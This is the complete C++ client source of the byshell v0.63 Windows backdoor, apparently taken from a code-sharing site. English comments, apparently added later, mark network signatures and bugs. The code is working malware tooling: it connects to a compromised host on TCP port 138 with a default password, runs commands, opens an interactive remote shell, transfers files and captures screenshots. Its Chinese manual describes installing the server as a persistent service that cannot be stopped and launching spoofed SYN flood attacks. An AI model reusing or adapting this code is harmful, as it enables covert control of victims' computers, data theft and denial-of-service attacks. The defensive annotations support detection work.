
📄 063cli.cpp

📁 byshell后门源代码
💻 CPP
//byshell v0.63 cli

#include <stdio.h>
#include <iostream.h>
#pragma comment(lib, "ws2_32.lib")
#include <winsock2.h>
#include <stdlib.h>
#include <stdio.h>
// File-scope state shared by main() and work():
//   pwd     - password placed in the first 16 bytes of every outgoing frame; the
//             compiled-in default is "by" (a fixed default credential).
//   buff    - single 66000-byte buffer used for both sending and receiving.
//   ip      - server address typed by the operator (31 bytes).
//   filefp  - handle of the local file used by the current get/put/screen transfer.
//   packnum - sequence number of the last file-transfer chunk that was accepted.
char pwd[16]="by";char buff[66000]={0};char ip[31]={0};HANDLE filefp;unsigned int packnum=0;
// Per-frame state machine; takes the current state in workflag and returns the next one.
char work(char * workbuff,unsigned int workbufflen,char workflag,int * psendlength);
// Prints the built-in manual.
void helpview(void);

// Entry point of the byshell v0.63 client (the controlling side of the tool).
// Reads the server address and the password from stdin, opens a TCP connection
// to port 138 on that address, then loops forever: build a frame, send it,
// read the reply, hand the reply to work().
//
// Frame layout as this function writes and reads it (the basis for a network
// signature of this traffic):
//   bytes  0..15  password copied from pwd with strncpy, in cleartext
//   bytes 16..27  never written by this client
//   bytes 28..31  total frame length, a 4-byte int copied in host byte order
//   bytes 32..    payload built or consumed by work()
// Port 138 is the NetBIOS datagram port, which normally runs over UDP, so a
// TCP session to 138 is unusual traffic worth alerting on.
//
// NOTE(review): the return values of WSAStartup, socket, bind and inet_addr are
// not checked, the socket is never closed (see the commented-out __finally after
// this function), and both failure paths call exit(0), i.e. report success.
void main(void){int ret;char workflag=0;
//printf("\tbyshell client ver 0.63\ntype HELP to view the detailed manual.\n");
printf("please input the server ip address\n");
// NOTE(review): gets() has no length limit; ip holds only 31 bytes.
gets(ip);printf("%s will be connected\n",ip);
WSADATA WSAData;WSAStartup(MAKEWORD(2,2),&WSAData);
SOCKET sock=socket(AF_INET,SOCK_STREAM,0);
// Local endpoint: any interface, port 0 (the system picks the source port).
sockaddr_in cliaddr;memset(&cliaddr,0,sizeof(struct sockaddr_in));
cliaddr.sin_family= AF_INET;
cliaddr.sin_port =0;
cliaddr.sin_addr.S_un.S_addr = INADDR_ANY;
// Remote endpoint: the typed address, fixed destination port 138.
sockaddr_in srvaddr;memset(&srvaddr,0,sizeof(struct sockaddr_in));
srvaddr.sin_family= AF_INET;
srvaddr.sin_port = htons(138);
srvaddr.sin_addr.S_un.S_addr = inet_addr(ip);
bind(sock,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr));
ret=connect(sock,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr));
if(ret==-1){printf("connect failed,check your network and remote ip.");exit(0);}
printf("input the password(the default one is \'by\')\n");
// NOTE(review): gets() again; pwd holds only 16 bytes.
gets(pwd);int sendlength=65536;int recvlen=0;
//gets not include the \r,but scanf will
// The password is copied in before work() runs, so a chpass command still
// travels under the old password; later frames carry the new one.
while(1){strncpy(buff,pwd,16);//copy pass before work,for chpass
// The payload starts at offset 32. On the first pass recvlen is 0, so recvlen-32
// converts to a very large unsigned value; state 0 of work() does not read it.
workflag=work(buff+32,recvlen-32,workflag,&sendlength);sendlength+=32;
memcpy(buff+28,&sendlength,4);
if(sendlength!=send(sock,buff,sendlength,0)){printf("fatal error in transmission\n");exit(0);}
// NOTE(review): recv() results are used unchecked. A return of 0 (peer closed)
// or -1 (error) either never ends the inner loop or makes recvlen shrink.
// duelen comes from the peer and is not range-checked against the 65536 limit.
memset(buff,0,65536); recvlen=recv(sock,buff,65536,0);int duelen;memcpy(&duelen,buff+28,4);
while(duelen>recvlen){recvlen+=recv(sock,buff+recvlen,65536-recvlen,0);}//solve data division
}
}
//__finally{closesocket(sock);}

//now these are work codes.
// Client-side protocol state machine, called once per exchange by main().
//
// Parameters:
//   workbuff    - payload area of the shared frame buffer (main passes buff+32);
//                 holds the server's reply on entry and the next request on return.
//   workbufflen - payload length of the reply as computed by main (recvlen-32).
//   workflag    - current state: 0 command prompt, 1 interactive shell,
//                 2 get (download), 3 put (upload), 4 screen capture download.
//   psendlength - receives the payload length of the request to send next.
// Returns the state to use for the next call.
//
// File data travels in chunks with a 5-byte header: a 4-byte chunk number in
// host byte order, then one flag byte that is 'f' on the final chunk. Uploads
// read 4000 data bytes per chunk. The literal strings "redirect",
// "packet dropped\n", "no such file\n", "no privilege to write\n" and
// "file system error\n" appear in cleartext payloads and can serve as
// signature material.
//
// NOTE(review): every memset(workbuff,0,65536) relies on main passing buff+32
// into a 66000-byte buffer; the function does not check this itself.
// NOTE(review): each "goto lab1" in states 2, 3 and 4 jumps back into the
// state-0 block, so the value returned afterwards is chosen by the state-0 code.
char work(char * workbuff,unsigned int workbufflen,char workflag,int * psendlength){

// State 0: show the server's reply, then prompt with "#" and read one command.
if(workflag==0){printf("%s",workbuff);
// NOTE(review): gets() has no length limit on the command line.
lab1: memset(workbuff,0,65536);printf("#");gets(workbuff);*psendlength=strlen(workbuff);
if(!strncmp(workbuff,"HELP",4) || !strncmp(workbuff,"help",4)){helpview();goto lab1;}
if(!strncmp(workbuff,"shell",5)){return 1;}
// chpass: the new password is whatever follows the 6-character command name.
// strncpy leaves pwd without a terminating NUL when that text is 16 bytes or more.
if(!strncmp(workbuff,"chpass",6)){strncpy(pwd,workbuff+6,16);return 0;}
//get\tDES\tSRC,
// get: open the local destination for writing and send "get" + remote source path.
// NOTE(review): "%s" in sscanf is unbounded while both arrays hold 255 bytes, and
// the CreateFile result is not checked here (the put branch does check it).
if(!strncmp(workbuff,"get",3)){packnum=0;char desfile[255]={0};char srcfile[255]={0};
	sscanf(workbuff,"get\t%s\t%s",desfile,srcfile);
	filefp=CreateFile(desfile,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
	memset(workbuff+3,0,514);strcat(workbuff,srcfile);*psendlength=strlen(workbuff);
	return 2;}
//put\tDES\tSRC
// put: open the local source for reading and send "put" + remote destination path.
if(!strncmp(workbuff,"put",3)){packnum=0;char desfile[255]={0};char srcfile[255]={0};
	sscanf(workbuff,"put\t%s\t%s",desfile,srcfile);
	filefp=CreateFile(srcfile,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
	if(filefp==INVALID_HANDLE_VALUE){printf("no such local file.\n");goto lab1;}
	memset(workbuff+3,0,514);strcat(workbuff,desfile);*psendlength=strlen(workbuff);
	return 3;}
// screen: the capture is written to a fixed path on the machine running this
// client; the CreateFile result is not checked.
if(!strncmp(workbuff,"screen",6)){packnum=0;
	filefp=CreateFile("c:\\remotedesktop.bmp",GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
	*psendlength=strlen(workbuff);return 4;
}
// Any other command line is sent to the server unchanged.
return 0;
}
//
// State 1: interactive shell. Print the reply, read a line, append "\r\n" and
// send it; a line starting with "endshell" is still sent, then state 0 follows.
if(workflag==1){printf("%s",workbuff);memset(workbuff,0,65536);
gets(workbuff);strcat(workbuff,"\r\n");*psendlength=strlen(workbuff);
if(!strncmp(workbuff,"endshell",8)){return 0;}
return 1;
}
//get
// State 2: download. The first 4 payload bytes are the chunk number.
if(workflag==2){unsigned int rcvpacknum=0;memcpy(&rcvpacknum,workbuff,4);
	if(!strncmp(workbuff,"no such file\n\0",14) && packnum==0){CloseHandle(filefp);printf("no such file\n");memset(workbuff,0,65536);goto lab1;}
//data division,especially TCP division,is BAD for us
	// Out-of-order chunk: request a resend with "redirect" + the expected number (12 bytes).
	if(rcvpacknum!=packnum+1){printf("packet dropped,redirecting");memset(workbuff,0,65536);strcpy(workbuff,"redirect");packnum+=1;memcpy(workbuff+8,&packnum,4);packnum-=1;*psendlength=12;return 2;}
	// NOTE(review): workbufflen is unsigned, so workbufflen-5 wraps to a huge
	// length when the reply payload is shorter than 5 bytes. The WriteFile return
	// value is not checked either; only the byte count is compared.
	DWORD byteswritten;WriteFile(filefp,workbuff+5,workbufflen-5,&byteswritten,0);if(byteswritten!=workbufflen-5){printf("warning:file system error\n");}
	// Not the final chunk: accept it and reply with the next expected chunk number (5 bytes).
	if(workbuff[4]!='f'){packnum+=1;memset(workbuff,0,65536);packnum+=1;memcpy(workbuff,&packnum,4);packnum-=1;printf(".");*psendlength=5;return 2;}
	printf("file downloaded.\n");CloseHandle(filefp);goto lab1;
}
//put
//redirect
// State 3, resend request: the server sent "redirect" + a chunk number. Seek to
// that chunk (4000 bytes each) and send it again.
// NOTE(review): reqpacknum comes from the peer and is not validated; a value of
// 0 makes packnum wrap. This memset clears 65520 bytes, not 65536 as elsewhere.
if(workflag==3 && strncmp(workbuff,"redirect",8)==0){unsigned int reqpacknum=0;memcpy(&reqpacknum,workbuff+8,4);memset(workbuff,0,65520);
	packnum=reqpacknum-1;SetFilePointer(filefp,4000*packnum,0,FILE_BEGIN);
	DWORD bytesread;ReadFile(filefp,workbuff+5,4000,&bytesread,0);
	if(bytesread==4000){packnum+=1;memcpy(workbuff,&reqpacknum,4);*psendlength=4005;return 3;}
	// Short read: mark the chunk final with 'f', close the file, go back to state 0.
	memcpy(workbuff,&reqpacknum,4);workbuff[4]='f';CloseHandle(filefp);*psendlength=5+bytesread;return 0;
}
// State 3, normal upload: the reply starts with the chunk number the server wants next.
if(workflag==3){unsigned int reqpacknum=0;memcpy(&reqpacknum,workbuff,4);
	if(!strncmp(workbuff,"no privilege to write\n",21) && packnum==0){CloseHandle(filefp);printf("no privilege to write\n");memset(workbuff,0,65536);goto lab1;}
	if(!strncmp(workbuff,"file system error\n",17)){CloseHandle(filefp);printf("file system error\n");memset(workbuff,0,65536);goto lab1;}
	if(reqpacknum!=packnum+1){memset(workbuff,0,65536);strcpy(workbuff,"packet dropped\n");*psendlength=strlen(workbuff);return 3;}//check,but not solve
	// NOTE(review): the ReadFile return value is not checked; only bytesread is used.
	DWORD bytesread;ReadFile(filefp,workbuff+5,4000,&bytesread,0);
	if(bytesread==4000){packnum+=1;memcpy(workbuff,&reqpacknum,4);printf(".");*psendlength=4005;return 3;}
	memcpy(workbuff,&reqpacknum,4);workbuff[4]='f';CloseHandle(filefp);*psendlength=5+bytesread;return 0;
}
//screen
// State 4: screen capture download; same chunk format as state 2, written to
// the file opened by the screen command.
if(workflag==4){unsigned int rcvpacknum=0;memcpy(&rcvpacknum,workbuff,4);
	// NOTE(review): this path returns without clearing workbuff or setting
	// *psendlength, so main sends the buffer contents again with a stale length.
	if(rcvpacknum!=packnum+1){CloseHandle(filefp);printf("packet dropped\n");return 0;}//check,but not solve
	// NOTE(review): same unsigned wrap of workbufflen-5 as in state 2.
	DWORD byteswritten;WriteFile(filefp,workbuff+5,workbufflen-5,&byteswritten,0);printf(".");if(byteswritten!=workbufflen-5){printf("warning:file system error\n");}
	// The acknowledgement here is 4 bytes long, where the get path sends 5.
	if(workbuff[4]!='f'){packnum+=1;memset(workbuff,0,65536);packnum+=1;memcpy(workbuff,&packnum,4);packnum-=1;*psendlength=4;return 4;}
	CloseHandle(filefp);printf("OK\n");goto lab1;
}




// Unknown state: fall back to state 0 without touching the buffer or *psendlength.
return 0;
}


// Prints the built-in manual (written in Chinese) to stdout with cout; takes no
// input and returns nothing. The text is reached from work() when the operator
// types HELP or help at the "#" prompt.
//
// What the manual states, as far as it matters for triage: the client binary
// is called bycli.exe and the server binary byshell.exe; the server is
// registered as a service with "byshell.exe -install" and removed with
// "byshell.exe -remove"; and the command set covers command execution, an
// interactive shell, process and module listing, process kill, file get/put,
// screen capture, several nuisance functions, and a server-side SYN flood
// feature with query and stop commands.
//
// NOTE(review): the banner says v0.63 but the body text still refers to
// v0.61A. In the put example, "receive\file.txt" contains "\f", which the
// compiler reads as a form-feed escape; the other separators are written "\\".
void helpview(void){
cout << "			BYshell     v0.63" <<endl;
cout << "						author:b.y" <<endl;
cout << "	byshell v0.61A是一个完全SDK编写的远程控制软件,作者允许此软件及其源代码自由传播,但引用时应注明原出处。在联系作者并得到同意之前,不得将此软件改编或删选后用作商业用途,但可用作学习和私人用途。" <<endl;
cout << "	本软件部分功能仅仅支持NT以上的Wind0wZ系统。bycli.exe为客户端(控制方),而byshell.exe为服务端(被控制端)。第一次使用时,在服务端执行byshell.exe -install,以后当服务端上网,byshell会以服务自动启动,此服务不能在进程管理器中停止。要删除服务,在服务端使用byshell.exe -remove,byshell就会被清除。" <<endl;
cout << "	byshell v0.61A是一个稳定版本,在文件传输,命令映射等功能上相比byshell v0.61有了很大的改进和提高,修正了已知的几乎所有BUG和缺陷。" <<endl;
cout << "	符号#是这个软件的命令提示符。目前支持的命令:" <<endl;
cout << "cmd		在此后跟你要执行的cmd命令,注意:只能执行一条单独的命令。仅仅支持NT以上的Wind0wZ系统。" <<endl;
cout << "	eg.  #cmddir c:\\winnt" <<endl;
cout << "shell		输入此命令后,进入交互的远程cmd,直到键入endshell返回#提示符。仅仅支持NT以上的Wind0wZ系统。" <<endl;
cout << "endshell	从shell状态返回#提示符。" <<endl;
cout << "chpass		改变后门密码。默认为“by”。" <<endl;
cout << "	eg.  #chpass123456" <<endl;
cout << "byver		查看连接的服务端的版本,新旧版本的客户服务端间交互时,可能有严重的兼容性问题。" <<endl;
cout << "sysinfo		取得对方的基本系统信息。" <<endl;
cout << "pslist		对方进程列表。" <<endl;
cout << "pskill		杀死对方指定进程。在此后跟你要杀死的进程的PID(由pslist得到)。" <<endl;
cout << "	eg.  #pskill972" <<endl;
cout << "modlist		对方指定进程加载的所有DLL的列表。在此后跟你要查看的进程的PID(由pslist得到)。" <<endl;
cout << "	eg.  #modlist972" <<endl;
cout << "get		在此软件的连接上下载远程文件。命令格式:" <<endl;
cout << "	get <tab键> 本地保存文件名 <tab键> 远程下载文件名" <<endl;
cout << "	eg.  #get	c:\\download\\file.txt	d:\\sourcefile.txt" <<endl;
cout << "put		在此软件的连接上向远程上传文件。命令格式:" <<endl;
cout << "	put <tab键> 远程保存文件名 <tab键> 本地上传文件名" <<endl;
cout << "	eg.  #put	d:\\receive\file.txt	c:\\sourcefile.txt" <<endl;
cout << "screen		远程截屏到本地,保存为“c:\\remotedesktop.bmp”文件,由此可查看远程桌面。" <<endl;
cout << "	搞笑功能,开怀一笑:" <<endl;
cout << "popmsg		弹出信息框。" <<endl;
cout << "	eg.  #popmsghello,are you all right?" <<endl;
cout << "swapmouse	远程鼠标左右键交换。" <<endl;
cout << "storemouse	远程鼠标左右键复原。" <<endl;
cout << "hidesys		隐藏远程桌面和任务栏。" <<endl;
cout << "showsys		恢复远程桌面和任务栏。" <<endl;
cout <<endl;
cout << "警告:以下的SYN功能有一定的危险性,仅仅用做测试。如果用户非法使用此功能攻击合法站点,将自己承担全部法律后果。" <<endl;
cout << "SYN		使用服务端发起SYN洪水的拒绝服务攻击测试。" <<endl;
cout << "参数:SYN 测试对象 测试的分钟数 IP伪造类型(可选参数,0是完全伪造,1是C段伪造,2是不伪造,默认为0) 攻击对象端口(可选参数,默认为80WWW端口) 使用的端口(可选参数,0是随机变化,默认为0)\n";
cout << "如果选择了某个可选参数,那么在它左边的可选参数就必须被选择,在它右边的可选参数则可以忽略。" <<endl;
cout << "	eg.	#SYN 172.18.1.5 15" <<endl;
cout << "	eg.	#SYN 172.18.1.5 15 1" <<endl;
cout << "	eg.	#SYN 172.18.1.5 15 1 445 12345" <<endl;
cout << "queryDOS	查询服务端SYN攻击测试的详细情况。" <<endl;
cout << "endDOS		强制结束服务端的SYN作业。" <<endl;

cout << "\n	由于作者是初学者,水平有限,程序一定存在很多BUG。谢谢各位朋友、前辈指教:" <<endl;
cout << "		华东师大软件学院04级  白远方   baiyuanfan@163.com" <<endl;
cout << "注:screen功能中用到的DDBtoDIB代码来源为xfocus.net的网友hzzh,著作权归他所有。" <<endl;
cout << "    特别感谢在我写这个小软件时给了我很大帮助的gxisone(谷夕),glacier(黄鑫)和xfocus.net的所有朋友,是他们的支持使我这个初学者能够克服困难和疑惑,最终完成这个程序。" <<endl;
cout << "" <<endl;




}








